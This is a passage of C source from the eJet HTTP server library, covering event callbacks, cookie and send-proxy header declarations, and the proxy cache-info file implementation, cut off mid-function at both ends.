conid = (ulong)iotimer_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->ready_timer == vobj) {
http_con_connect(pcon);
}
return 0;
} else if (cmd == t_httpsrv_life) {
ulong srvid = 0;
HTTPSrv * srv = NULL;
srvid = (ulong)iotimer_para(vobj);
srv = http_mgmt_srv_get(mgmt, srvid);
if (srv && srv->life_timer == vobj) {
http_srv_lifecheck(srv);
}
return 0;
}
break;
case IOE_CONNECTED:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->pdev == vobj) {
/* check pcon first to avoid a NULL dereference; briefly take rcvCS to
   synchronize with any concurrent receive on this connection */
EnterCriticalSection(&pcon->rcvCS);
LeaveCriticalSection(&pcon->rcvCS);
return http_con_connected(pcon);
} else {
return -20;
}
break;
case IOE_CONNFAIL:
conid = (ulong)iodev_para(vobj);
pcon = http_mgmt_con_get(mgmt, conid);
if (pcon && pcon->pdev == vobj) {
tolog(1, "eJet - TCP Connect: failed to build connection to '%s:%d'.\n",
pcon->dstip, pcon->dstport);
} else {
return -20;
}
break;
default:
return -1;
}
return -1;
}
void print_pump_arg (void * vobj, int event, int fdtype)
{
#ifdef _DEBUG
char buf[256];
buf[0] = '\0';
sprintf(buf+strlen(buf), "HTTP_Pump: ");
if (event == IOE_CONNECTED) sprintf(buf+strlen(buf), "IOE_CONNECTED");
else if (event == IOE_CONNFAIL) sprintf(buf+strlen(buf), "IOE_CONNFAIL");
else if (event == IOE_ACCEPT) sprintf(buf+strlen(buf), "IOE_ACCEPT");
else if (event == IOE_READ) sprintf(buf+strlen(buf), "IOE_READ");
else if (event == IOE_WRITE) sprintf(buf+strlen(buf), "IOE_WRITE");
else if (event == IOE_TIMEOUT) sprintf(buf+strlen(buf), "IOE_TIMEOUT");
else if (event == IOE_INVALID_DEV) sprintf(buf+strlen(buf), "IOE_INVALID_DEV");
else sprintf(buf+strlen(buf), "Unknown");
if (event != IOE_TIMEOUT) {
sprintf(buf+strlen(buf), " ");
if (fdtype == FDT_LISTEN) sprintf(buf+strlen(buf), "FDT_LISTEN");
else if (fdtype == FDT_CONNECTED) sprintf(buf+strlen(buf), "FDT_CONNECTED");
else if (fdtype == FDT_ACCEPTED) sprintf(buf+strlen(buf), "FDT_ACCEPTED");
else if (fdtype == FDT_UDPSRV) sprintf(buf+strlen(buf), "FDT_UDPSRV");
else if (fdtype == FDT_UDPCLI) sprintf(buf+strlen(buf), "FDT_UDPCLI");
else if (fdtype == FDT_RAWSOCK) sprintf(buf+strlen(buf), "FDT_RAWSOCK");
else if (fdtype == FDT_TIMER) sprintf(buf+strlen(buf), "FDT_TIMER");
else if (fdtype == FDT_LINGER_CLOSE) sprintf(buf+strlen(buf), "FDT_LINGER_CLOSE");
else if (fdtype == FDT_STDIN) sprintf(buf+strlen(buf), "FDT_STDIN");
else if (fdtype == FDT_STDOUT) sprintf(buf+strlen(buf), "FDT_STDOUT");
else if (fdtype == FDT_USOCK_LISTEN) sprintf(buf+strlen(buf), "FDT_USOCK_LISTEN");
else if (fdtype == FDT_USOCK_CONNECTED) sprintf(buf+strlen(buf), "FDT_USOCK_CONNECTED");
else if (fdtype == FDT_USOCK_ACCEPTED) sprintf(buf+strlen(buf), "FDT_USOCK_ACCEPTED");
else sprintf(buf+strlen(buf), "Unknown Type");
sprintf(buf+strlen(buf), " FD=%d R<%s:%d> L<%s:%d>",
iodev_fd(vobj), iodev_rip(vobj), iodev_rport(vobj),
iodev_lip(vobj), iodev_lport(vobj));
} else {
if (vobj) {
sprintf(buf+strlen(buf), " CmdID=%d ID=%lu WID=%lu",
iotimer_cmdid(vobj), iotimer_id(vobj), iotimer_workerid(vobj));
}
}
printf("%s\n", buf);
#endif
}
<|start_filename|>include/http_sndpxy.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_SNDPXY_H_
#define _HTTP_SNDPXY_H_
#ifdef UNIX
#include <regex.h>
#endif
#if defined(_WIN32) || defined(_WIN64)
#define PCRE_STATIC 1
#include "pcre.h"
#endif
#ifdef __cplusplus
extern "C" {
#endif
typedef struct cli_send_proxy_s {
char * host;
#ifdef UNIX
regex_t * preg;
#endif
#if defined(_WIN32) || defined(_WIN64)
pcre * preg;
#endif
char * proxy;
int port;
} SendProxy;
int http_send_proxy_init (void * vmgmt);
void http_send_proxy_clean (void * vmgmt);
int http_send_proxy_check (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_cookie.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_COOKIE_H_
#define _HTTP_COOKIE_H_
#ifdef __cplusplus
extern "C" {
#endif
#define t_http_cookie_scan 2170
typedef struct http_cookie_ {
/* must not contain the following characters:
CTRLs Space \t ( ) < > @ , ; : \ " / [ ] ? = { } */
char * name;
int namelen;
/* must not contain the following characters:
CTRLs Space " , ; \ */
char * value;
int valuelen;
char * path;
int pathlen;
char * domain;
int domainlen;
time_t expire;
int maxage;
uint8 httponly;
uint8 secure;
uint8 samesite; //0-unknown 1-Strict 2-Lax
time_t createtime;
void * ckpath;
} HTTPCookie, cookie_t;
void * http_cookie_alloc ();
void http_cookie_free (void * vckie);
typedef struct cookie_path_ {
char path[128];
arr_t * cookie_list;
} cookie_path_t, CookiePath;
void * cookie_path_alloc ();
void cookie_path_free (void * vpath);
typedef struct cookie_domain_ {
char domain[128];
actrie_t * cookie_path_trie;
arr_t * cookie_path_list;
} cookie_domain_t, CookieDomain;
void * cookie_domain_alloc ();
void cookie_domain_free (void * vdomain);
typedef struct http_cookie_mgmt {
/* reverse multi-pattern matching based on domain */
CRITICAL_SECTION cookieCS;
actrie_t * domain_trie;
hashtab_t * domain_table;
/* all cookies list under different domains and paths */
arr_t * cookie_list;
/* scan the cookie list to remove the expired cookies every 300 seconds */
void * scan_timer;
char * cookie_file;
void * httpmgmt;
} CookieMgmt, cookie_mgmt_t;
void * cookie_mgmt_alloc (void * vhttpmgmt, char * ckiefile);
void cookie_mgmt_free (void * vmgmt);
int cookie_mgmt_read (void * vmgmt, char * cookiefile);
int cookie_mgmt_write (void * vmgmt, char * cookiefile);
int cookie_mgmt_scan (void * vmgmt);
int cookie_mgmt_add (void * vmgmt, void * vckie);
void * cookie_mgmt_get (void * vmgmt, char * domain, int domainlen,
char * path, int pathlen, char * ckiename, int ckienlen);
int cookie_mgmt_mget(void * vmgmt, char * domain, int domainlen, char * path, int pathlen, arr_t ** cklist);
int cookie_mgmt_set (void * vmgmt, char * ckname, int cknlen, char * ckvalue, int ckvlen,
char * domain, int domainlen, char * path, int pathlen, time_t expire,
int maxage, uint8 httponly, uint8 secure, uint8 samesite);
int cookie_mgmt_parse (void * vmgmt, char * setcookie, int len, char * defdom, int defdomlen);
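/* Illustrative usage (a sketch, not taken from real call sites; the literal values are
   made up): after receiving a Set-Cookie header from host "example.com",
     char * setck = "sid=a3fWa; Path=/; Domain=example.com; Max-Age=3600; HttpOnly";
     cookie_mgmt_parse(mgmt, setck, strlen(setck), "example.com", 11);
   later, cookie_mgmt_mget(mgmt, "example.com", 11, "/", 1, &cklist) would presumably return
   the cookies applicable to an outgoing request for that domain and path. */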
int cookie_callback (void * vmgmt, void * vobj, int event, int fdtype);
int http_cookie_add (void * vmsg);
int http_set_cookie_parse (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_cache.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_header.h"
#include "http_listen.h"
#include "http_variable.h"
#include "http_cache.h"
extern HTTPMgmt * gp_httpmgmt;
void * cache_info_alloc ()
{
CacheInfo * cacinfo = NULL;
cacinfo = kzalloc(sizeof(*cacinfo));
if (!cacinfo) return NULL;
InitializeCriticalSection(&cacinfo->cacheCS);
cacinfo->frag = frag_pack_alloc();
return cacinfo;
}
void cache_info_free (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return;
if (frag_pack_complete(cacinfo->frag)) {
if (strcmp(cacinfo->cache_tmp, cacinfo->cache_file) != 0)
rename(cacinfo->cache_tmp, cacinfo->cache_file);
}
if (cacinfo->cache_file) {
kfree(cacinfo->cache_file);
cacinfo->cache_file = NULL;
}
if (cacinfo->cache_tmp) {
kfree(cacinfo->cache_tmp);
cacinfo->cache_tmp = NULL;
}
if (cacinfo->info_file) {
kfree(cacinfo->info_file);
cacinfo->info_file = NULL;
}
if (cacinfo->hinfo) {
native_file_close(cacinfo->hinfo);
cacinfo->hinfo = NULL;
}
if (cacinfo->frag) {
frag_pack_free(cacinfo->frag);
cacinfo->frag = NULL;
}
DeleteCriticalSection(&cacinfo->cacheCS);
kfree(cacinfo);
}
int cache_info_zero (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return -1;
if (cacinfo->cache_file) {
kfree(cacinfo->cache_file);
cacinfo->cache_file = NULL;
}
if (cacinfo->cache_tmp) {
kfree(cacinfo->cache_tmp);
cacinfo->cache_tmp = NULL;
}
if (cacinfo->info_file) {
kfree(cacinfo->info_file);
cacinfo->info_file = NULL;
}
if (cacinfo->hinfo) {
native_file_close(cacinfo->hinfo);
cacinfo->hinfo = NULL;
}
cacinfo->body_flag = 0;
cacinfo->header_length = 0;
cacinfo->body_length = 0;
cacinfo->body_rcvlen = 0;
cacinfo->directive = 0;
cacinfo->revalidate = 0;
cacinfo->pubattr = 0;
cacinfo->ctime = 0;
cacinfo->expire = 0;
cacinfo->maxage = 0;
cacinfo->mtime = 0;
memset(cacinfo->etag, 0, sizeof(cacinfo->etag));
if (cacinfo->frag) {
frag_pack_zero(cacinfo->frag);
}
return 0;
}
int64 cache_info_body_length (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return -1;
return cacinfo->body_length;
}
static char * cache_info_file (char * cafile, int cafnlen)
{
int pathlen = 0;
char * fname = NULL;
int fnlen = 0;
char * p = NULL;
int len = 0;
if (!cafile) return NULL;
if (cafnlen < 0) cafnlen = strlen(cafile);
if (cafnlen <= 0) return NULL;
p = rskipTo(cafile + cafnlen - 1, cafnlen, "/\\", 2);
if (p < cafile) {
fname = cafile;
fnlen = cafnlen;
pathlen = 0;
} else {
fname = p + 1;
fnlen = cafile + cafnlen - fname;
pathlen = fname - cafile;
}
    /* path/.cacheinfo/fname.ext.cacinf, or ./.cacheinfo/fname.ext.cacinf when no path is given */
len = cafnlen + 2 + 11 + 7 + 1;
p = kalloc(len);
if (pathlen <= 0) {
#if defined(_WIN32) || defined(_WIN64)
strcpy(p, ".\\");
#else
strcpy(p, "./");
#endif
} else {
str_secpy(p, len-1, cafile, pathlen);
}
#if defined(_WIN32) || defined(_WIN64)
str_secpy(p + strlen(p), len - 1 - strlen(p), ".cacheinfo\\", 11);
#else
str_secpy(p + strlen(p), len - 1 - strlen(p), ".cacheinfo/", 11);
#endif
str_secpy(p + strlen(p), len - 1 - strlen(p), fname, fnlen);
str_secpy(p + strlen(p), len - 1 - strlen(p), ".cacinf", 7);
return p;
}
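/* Example of the mapping implemented above (illustrative, derived from the code):
 * a cache file path such as "web/imgs/logo.png" yields the info-file path
 * "web/imgs/.cacheinfo/logo.png.cacinf", while a bare file name such as
 * "logo.png" yields "./.cacheinfo/logo.png.cacinf" (with '\' separators on Windows). */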
int cache_info_read (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
uint8 buf[96];
int val32 = 0;
int64 val64 = 0;
int iter = 0;
if (!cacinfo) return -1;
if (!cacinfo->hinfo) return -2;
native_file_seek(cacinfo->hinfo, 0);
native_file_read(cacinfo->hinfo, buf, 96);
if (strncasecmp((char *)buf + iter, "EJT", 3) != 0) {
return -100;
}
iter += 3;
memcpy(&val32, buf+iter, 4); iter += 4;
cacinfo->mimeid = ntohl(val32);
cacinfo->body_flag = buf[iter]; iter++;
memcpy(&val32, buf+iter, 4); iter += 4;
cacinfo->header_length = ntohl(val32);
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->body_length = ntohll(val64);
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->body_rcvlen = ntohll(val64);
cacinfo->directive = buf[iter]; iter++;
cacinfo->revalidate = buf[iter]; iter++;
cacinfo->pubattr = buf[iter]; iter++;
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->ctime = ntohll(val64);
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->expire = ntohll(val64);
memcpy(&val32, buf+iter, 4); iter += 4;
cacinfo->maxage = ntohl(val32);
memcpy(&val64, buf+iter, 8); iter += 8;
cacinfo->mtime = ntohll(val64);
memcpy(cacinfo->etag, buf+iter, 32); iter += 32;
frag_pack_read(cacinfo->frag, cacinfo->hinfo, 96);
if (cacinfo->body_length > 0 && frag_pack_length(cacinfo->frag) <= 0)
frag_pack_set_length(cacinfo->frag, cacinfo->body_length);
return 0;
}
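/* Layout of the fixed 96-byte meta record parsed above and mirrored by
 * cache_info_write_meta below (offsets derived from the code; multi-byte
 * fields are stored in network byte order):
 *   0-2   magic "EJT"           3-6   mimeid (uint32)
 *   7     body_flag             8-11  header_length (uint32)
 *   12-19 body_length (int64)   20-27 body_rcvlen (int64)
 *   28    directive             29    revalidate
 *   30    pubattr               31-38 ctime
 *   39-46 expire                47-50 maxage (int32)
 *   51-58 mtime                 59-90 etag (32 bytes)
 *   91-95 unused padding; the frag-pack data starts at file offset 96. */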
int cache_info_write_meta (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
uint8 buf[96];
int val32 = 0;
int64 val64 = 0;
int iter = 0;
if (!cacinfo) return -1;
if (!cacinfo->hinfo) return -2;
memset(buf, 0, sizeof(buf));
memcpy(buf+iter, "EJT", 3); iter += 3;
val32 = htonl(cacinfo->mimeid);
memcpy(buf+iter, &val32, 4); iter += 4;
buf[iter] = cacinfo->body_flag; iter++;
val32 = htonl(cacinfo->header_length);
memcpy(buf+iter, &val32, 4); iter += 4;
val64 = htonll(cacinfo->body_length);
memcpy(buf+iter, &val64, 8); iter += 8;
val64 = htonll(cacinfo->body_rcvlen);
memcpy(buf+iter, &val64, 8); iter += 8;
buf[iter] = cacinfo->directive; iter++;
buf[iter] = cacinfo->revalidate; iter++;
buf[iter] = cacinfo->pubattr; iter++;
val64 = cacinfo->ctime; val64 = htonll(val64);
memcpy(buf+iter, &val64, 8); iter += 8;
val64 = cacinfo->expire; val64 = htonll(val64);
memcpy(buf+iter, &val64, 8); iter += 8;
val32 = cacinfo->maxage; val32 = htonl(val32);
memcpy(buf+iter, &val32, 4); iter += 4;
val64 = cacinfo->mtime; val64 = htonll(val64);
memcpy(buf+iter, &val64, 8); iter += 8;
str_secpy(buf+iter, 32, cacinfo->etag, str_len(cacinfo->etag));
iter += 32;
native_file_seek(cacinfo->hinfo, 0);
native_file_write(cacinfo->hinfo, buf, 96);
return 0;
}
int cache_info_write_frag (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return -1;
if (!cacinfo->hinfo) return -2;
return frag_pack_write(cacinfo->frag, cacinfo->hinfo, 96);
}
int cache_info_write (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
int len = 0;
if (!cacinfo) return -1;
if (!cacinfo->hinfo) return -2;
cache_info_write_meta(cacinfo);
len = cache_info_write_frag(cacinfo);
if (len >= 12) {
native_file_resize(cacinfo->hinfo, 96 + len);
}
return 0;
}
int cache_info_add_frag (void * vcacinfo, int64 pos, int64 len, int complete)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
int fragnum = 0;
int64 rcvlen = 0;
int ret = 0;
if (!cacinfo) return -1;
if (!cacinfo->frag) return -2;
EnterCriticalSection(&cacinfo->cacheCS);
frag_pack_add(cacinfo->frag, pos, len);
cacinfo->body_rcvlen += len;
if (complete) {
rcvlen = frag_pack_rcvlen(cacinfo->frag, &fragnum);
if (fragnum == 1 && rcvlen == frag_pack_curlen(cacinfo->frag)) {
frag_pack_set_length(cacinfo->frag, rcvlen);
cacinfo->body_length = rcvlen;
}
}
ret = cache_info_write(cacinfo);
LeaveCriticalSection(&cacinfo->cacheCS);
return ret;
}
int cache_info_verify (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
if (!cacinfo) return -1;
if (cacinfo->directive > 0) //0-max-age 1-no cache 2-no store
return 0;
if (cacinfo->revalidate > 0) //0-none 1-must-revalidate
return 0;
if (cacinfo->expire > 0 && cacinfo->expire > time(NULL))
return 0;
if (cacinfo->maxage > 0 && cacinfo->mtime + cacinfo->maxage > time(NULL))
return 0;
return 1;
}
int cache_info_cmp_key (void * a, void * b)
{
CacheInfo * cacinfo = (CacheInfo *)a;
char * fname = (char *)b;
if (!a) return -1;
if (!b) return 1;
return strcmp(cacinfo->cache_file, fname);
}
int http_cache_info_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
InitializeCriticalSection(&mgmt->cacinfoCS);
mgmt->cacinfo_table = ht_new(200, cache_info_cmp_key);
tolog(1, "eJet - Proxy Cache resource allocated successfully.\n");
return 0;
}
int http_cache_info_clean (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
DeleteCriticalSection(&mgmt->cacinfoCS);
if (mgmt->cacinfo_table) {
ht_free_all(mgmt->cacinfo_table, cache_info_free);
mgmt->cacinfo_table = NULL;
}
tolog(1, "eJet - Proxy Cache resources cleaned.\n");
return 0;
}
void * cache_info_open (void * vmgmt, char * cafile)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
CacheInfo * cacinfo = NULL;
int cafnlen = 0;
struct stat st;
char * fname = NULL;
void * hinfo = NULL;
if (!mgmt) return NULL;
if (!cafile || (cafnlen = strlen(cafile)) <= 0)
return NULL;
EnterCriticalSection(&mgmt->cacinfoCS);
cacinfo = ht_get(mgmt->cacinfo_table, cafile);
if (cacinfo) {
cacinfo->count++;
LeaveCriticalSection(&mgmt->cacinfoCS);
return cacinfo;
}
/* according to actual filename.ext, generate cacheinfo file: ./.cacheinfo/filename.ext.cacinf */
fname = cache_info_file(cafile, cafnlen);
if (!fname) goto nullret;
    if (file_stat(fname, &st) < 0) { //cache info file does not exist
kfree(fname);
goto nullret;
}
hinfo = native_file_open(fname, NF_READ | NF_WRITE);
if (!hinfo) {
kfree(fname);
goto nullret;
}
cacinfo = cache_info_alloc();
if (!cacinfo) {
kfree(fname);
native_file_close(hinfo);
goto nullret;
}
cacinfo->httpmgmt = mgmt;
cacinfo->info_file = fname;
cacinfo->hinfo = hinfo;
if (cache_info_read(cacinfo) < 0) {
cache_info_free(cacinfo);
goto nullret;
}
cacinfo->cache_file = str_dup(cafile, cafnlen);
cacinfo->cache_tmp = kzalloc(cafnlen + 4 + 1);
sprintf(cacinfo->cache_tmp, "%s.tmp", cafile);
if (frag_pack_curlen(cacinfo->frag) > 0 &&
frag_pack_complete(cacinfo->frag) == 0 &&
(file_stat(cacinfo->cache_tmp, &st) < 0 || st.st_size <= 0))
{
frag_pack_zero(cacinfo->frag);
cacinfo->body_rcvlen = 0;
}
cacinfo->count = 1;
ht_set(mgmt->cacinfo_table, cafile, cacinfo);
LeaveCriticalSection(&mgmt->cacinfoCS);
return cacinfo;
nullret:
LeaveCriticalSection(&mgmt->cacinfoCS);
return NULL;
}
void cache_info_close (void * vcacinfo)
{
CacheInfo * cacinfo = (CacheInfo *)vcacinfo;
HTTPMgmt * mgmt = NULL;
if (!cacinfo) return;
mgmt = gp_httpmgmt;
if (!mgmt) mgmt = cacinfo->httpmgmt;
if (!mgmt) return;
EnterCriticalSection(&mgmt->cacinfoCS);
cacinfo = ht_get(mgmt->cacinfo_table, cacinfo->cache_file);
if (!cacinfo) {
LeaveCriticalSection(&mgmt->cacinfoCS);
return;
}
if (--cacinfo->count <= 0) {
ht_delete(mgmt->cacinfo_table, cacinfo->cache_file);
cache_info_free(cacinfo);
LeaveCriticalSection(&mgmt->cacinfoCS);
return;
}
LeaveCriticalSection(&mgmt->cacinfoCS);
}
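/* Usage sketch for the reference-counted cache-info table (illustrative, not part
 * of the original source): each successful cache_info_open/cache_info_create
 * increments cacinfo->count, and each cache_info_close decrements it; the object
 * is only removed from mgmt->cacinfo_table and freed when the count reaches zero.
 * The file path below is hypothetical.
 *
 *     CacheInfo * ci = cache_info_open(mgmt, "cache/file.bin");
 *     if (ci) {
 *         ... use ci->frag, ci->body_length ...
 *         cache_info_close(ci);
 *     }
 */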
void * cache_info_create (void * vmgmt, char * cafile, int64 fsize)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
CacheInfo * cacinfo = NULL;
int cafnlen = 0;
char * fname = NULL;
void * hinfo = NULL;
if (!mgmt) return NULL;
if (!cafile || (cafnlen = strlen(cafile)) <= 0)
return NULL;
EnterCriticalSection(&mgmt->cacinfoCS);
cacinfo = ht_get(mgmt->cacinfo_table, cafile);
if (cacinfo) {
cacinfo->count++;
if (fsize > 0) {
cacinfo->body_length = fsize;
frag_pack_set_length(cacinfo->frag, fsize);
}
LeaveCriticalSection(&mgmt->cacinfoCS);
return cacinfo;
}
fname = cache_info_file(cafile, cafnlen);
if (!fname) goto nullret;
file_dir_create(fname, 1);
hinfo = native_file_open(fname, NF_READ | NF_WRITE);
if (!hinfo) {
kfree(fname);
goto nullret;
}
cacinfo = cache_info_alloc();
if (!cacinfo) {
kfree(fname);
native_file_close(hinfo);
goto nullret;
}
cacinfo->httpmgmt = mgmt;
cacinfo->info_file = fname;
cacinfo->hinfo = hinfo;
cacinfo->cache_file = str_dup(cafile, cafnlen);
cacinfo->cache_tmp = kzalloc(cafnlen + 4 + 1);
sprintf(cacinfo->cache_tmp, "%s.tmp", cafile);
if (fsize > 0) {
cacinfo->body_length = fsize;
frag_pack_set_length(cacinfo->frag, fsize);
}
cacinfo->count = 1;
ht_set(mgmt->cacinfo_table, cafile, cacinfo);
LeaveCriticalSection(&mgmt->cacinfoCS);
return cacinfo;
nullret:
LeaveCriticalSection(&mgmt->cacinfoCS);
return NULL;
}
int http_request_cache_init (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
char path[512];
ulong hash;
char * ctype = NULL;
char * extname = NULL;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
if (msg->req_file_handle) return 0;
#if defined(_WIN32) || defined(_WIN64)
snprintf(path, sizeof(path) - 1, "%s\\ucache", msg->GetRootPath(msg));
#else
snprintf(path, sizeof(path) - 1, "%s/ucache", msg->GetRootPath(msg));
#endif
hash = generic_hash(msg->docuri->path, msg->docuri->pathlen, 0);
hash = hash % 307;
#if defined(_WIN32) || defined(_WIN64)
sprintf(path+strlen(path), "\\%lu\\", hash);
#else
sprintf(path+strlen(path), "/%lu/", hash);
#endif
file_dir_create(path, 0);
msg->GetReqContentTypeP(msg, &ctype, NULL);
mime_type_get_by_mime(mgmt->mimemgmt, ctype, &extname, NULL, NULL);
sprintf(path+strlen(path), "%s-%ld%s",
msg->srcip, msg->msgid, extname);
msg->req_file_name = str_dup(path, strlen(path));
msg->req_file_handle = native_file_open(path, NF_WRITEPLUS);
msg->req_file_cache = 1;
    /* truncate any stale content in the request cache file just opened */
    if (native_file_size(msg->req_file_handle) > 0) {
        native_file_resize(msg->req_file_handle, 0);
    }
return 1;
}
int http_response_cache_init (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPLoc * ploc = NULL;
char * cachefn = NULL;
int fnlen = 0;
char buf[2048];
int ret = 0;
http_partial_t * part = NULL;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
if (msg->res_file_handle)
return 0;
if (msg->res_store_file) {
msg->res_file_handle = native_file_open(msg->res_store_file, NF_WRITEPLUS);
msg->res_file_cache = 2;
if (msg->res_file_handle && msg->res_store_offset > 0) {
native_file_seek(msg->res_file_handle, msg->res_store_offset);
} else if (native_file_size(msg->res_file_handle) > 0) {
native_file_resize(msg->res_file_handle, 0);
}
goto end;
}
ploc = (HTTPLoc *)msg->ploc;
if (ploc) {
if (ploc->cache == 0 || str_len(ploc->cachefile) <= 0)
return 0;
cachefn = ploc->cachefile;
fnlen = strlen(cachefn);
} else {
if (mgmt->srv_resp_cache == 0 || strlen(mgmt->srv_resp_cache_file) <= 0)
return 0;
cachefn = mgmt->srv_resp_cache_file;
fnlen = strlen(cachefn);
}
ret = http_var_copy(msg, cachefn, fnlen, buf, sizeof(buf)-1, NULL, 0, "cache file", 4);
if (ret <= 0) return 0;
for (ret = 0; ret < (int)strlen(buf); ret++) {
        if (buf[ret] == ':') { //replace colons except the drive-letter colon in paths like D:\prj\src\disk.txt
if (ret > 1) buf[ret] = '_';
} else if (buf[ret] == '?') buf[ret] = '_';
#if defined(_WIN32) || defined(_WIN64)
else if (buf[ret] == '/') buf[ret] = '\\';
#endif
}
msg->res_file_name = str_dup(buf, strlen(buf));
file_dir_create(msg->res_file_name, 1);
msg->res_file_handle = native_file_open(msg->res_file_name, NF_WRITEPLUS);
msg->res_file_cache = 1;
    /* if the client request contains a Range header, seek to the given position */
if (msg->partial_flag > 0) {
part = vstar_get(msg->partial_list, 0);
if (part && part->start > 0)
native_file_seek(msg->res_file_handle, part->start);
}
/*if (native_file_size(msg->res_file_handle) > 0) {
native_file_resize(msg->res_file_handle, 0);
}*/
end:
return msg->res_file_cache;
}
int http_request_in_cache (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
http_partial_t * part = NULL;
CacheInfo * cacinfo = NULL;
int64 gappos = 0;
int64 gaplen = 0;
int64 reqpos = 0;
int64 reqlen = 0;
int64 start = 0;
int64 length = 0;
int i, num, ret;
int incache = 1;
uint8 execed = 0;
if (!msg) return -1;
cacinfo = msg->res_cache_info;
if (!cacinfo) return 0;
    /* check whether the data requested by the client is completely available in the local cache.
       if the client request contains a Range header, seek to the given position */
incache = 1;
if (msg->partial_flag > 0) {
num = vstar_num(msg->partial_list);
for (i = 0; i < num; i++) {
part = vstar_get(msg->partial_list, i);
if (!part) continue;
if (part->partflag == 1) {
start = part->start;
length = part->length;
} else if (part->partflag == 2) {
start = part->start;
if (cacinfo->body_length > 0)
length = cacinfo->body_length - start;
else
length = -1;
} else if (part->partflag == 3) {
length = part->length;
if (cacinfo->body_length > 0)
start = cacinfo->body_length - length;
else
start = cacinfo->body_rcvlen - length;
} else {
start = part->start;
length = part->length;
}
ret = frag_pack_contain(cacinfo->frag, start, length,
&reqpos, &reqlen, &gappos, &gaplen);
if (ret < 3) { //ret 0:not in cache 1:right-side partial 2:left-side partial 3:in cache
incache = 0;
}
execed = 1;
msg->cache_req_off = gappos;
msg->cache_req_len = gaplen;
msg->cache_req_start = start;
break;
}
}
if (!execed) {
ret = frag_pack_contain(cacinfo->frag, 0, -1, &reqpos, &reqlen, &gappos, &gaplen);
if (ret < 3) { //ret 0:not in cache 1:right-side partial 2:left-side partial 3:in cache
incache = 0;
}
msg->cache_req_off = gappos;
msg->cache_req_len = gaplen;
msg->cache_req_start = 0;
}
return incache;
}
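/* Note (derived from the code above): on return, msg->cache_req_start holds the byte
 * offset the client asked for, while msg->cache_req_off and msg->cache_req_len describe
 * the first gap still missing from the local cache that must be fetched from the origin.
 * A return value of 1 means the checked range is already fully cached; 0 means a gap
 * remains. Only the first entry of the partial list is examined before the loop breaks. */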
int http_proxy_cache_open (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPLoc * ploc = NULL;
char * cachefn = NULL;
int fnlen = 0;
char buf[1024];
int ret = 0;
CacheInfo * cacinfo = NULL;
int incache = 0;
if (!msg) return -1;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -2;
ploc = (HTTPLoc *)msg->ploc;
if (ploc) {
if (ploc->cache == 0 || str_len(ploc->cachefile) <= 0) {
msg->cacheon = 0;
return 0;
}
cachefn = ploc->cachefile;
fnlen = strlen(cachefn);
} else {
if (mgmt->srv_resp_cache == 0 || strlen(mgmt->srv_resp_cache_file) <= 0) {
msg->cacheon = 0;
return 0;
}
cachefn = mgmt->srv_resp_cache_file;
fnlen = strlen(cachefn);
}
msg->cacheon = 1;
ret = http_var_copy(msg, cachefn, fnlen, buf, sizeof(buf)-1, NULL, 0, "cache file", 4);
if (ret <= 0) {
msg->cacheon = 0;
return 0;
}
for (ret = 0; ret < (int)strlen(buf); ret++) {
        if (buf[ret] == ':') { //replace colons except the drive-letter colon in paths like D:\prj\src\disk.txt
if (ret > 1) buf[ret] = '_';
} else if (buf[ret] == '?') buf[ret] = '_';
#if defined(_WIN32) || defined(_WIN64)
else if (buf[ret] == '/') buf[ret] = '\\';
#endif
}
msg->res_file_name = str_dup(buf, strlen(buf));
if (file_is_regular(msg->res_file_name)) {
msg->res_file_cache = 3;
incache = 2;
}
cacinfo = msg->res_cache_info = cache_info_open(mgmt, buf);
if (!cacinfo) {
msg->res_file_cache = 0;
return msg->res_file_cache;
}
if (incache <= 0) {
        /* check whether the data requested by the client is completely available in the local cache.
           if the client request contains a Range header, seek to the given position */
incache = http_request_in_cache(msg);
